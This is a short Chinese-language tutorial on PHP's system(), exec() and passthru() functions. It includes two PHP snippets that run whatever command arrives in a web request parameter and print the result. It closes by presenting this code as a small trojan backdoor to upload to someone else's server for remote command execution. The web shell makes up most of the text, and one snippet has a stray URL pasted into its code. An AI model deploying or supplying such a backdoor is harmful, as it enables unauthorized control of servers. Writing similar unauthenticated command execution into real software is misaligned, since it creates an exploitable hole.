php执行shell命令,可以使用下面几个函数:string system ( string $command [, int &$return_var ] )string exec ( string $command [, array &$output [, int &$return_var ]] )void passthru ( string $command [, int &$return_var ] )
注意:
这三个函数在默认的情况下,都是被禁止了的
如果要使用这几个函数,
就要先修改php的配置文件php.ini
查找关键字disable_functions,将这一项中的这几个函数名删除掉
然后注意重启apache。
首先看一下system()和passthru()两个功能类似,可以互换:<?php #获取网页传递参数$shell = $_REQUEST['shell'];echo "
";system($shell, $status);echo "";//注意shell命令的执行结果和执行返回的状态值的对应关系$shell = "";if( $status ){echo "shell命令{$shell}执行失败";} else {echo "shell命令{$shell}成功执行";}?>
访问地址,并传递shell参数
注意,system()会将shell命令执行之后,立马显示结果,这一点会比较不方便,因为我们有时候不需要结果立马输出,甚至不需要输出,于是可以用到exec()
exec()的使用示例:<?php $shell = https://www.xiaoyuani.com/ $_REQUEST['shell'];exec($shell, $result, $status);$shell = "$shell";echo "
";if( $status ){echo "shell命令{$shell}执行失败";} else {echo "shell命令{$shell}成功执行, 结果如下";print_r( $result );}echo "";?>
exec()执行shell命令成功,但是并不返回结果,需要使用输出命令,输出$result结果
作为木马小后门,上传到对方服务器下的网站目录下,访问该地址,就可以在靶机上执行你想执行的命令,并且拿到回显结果。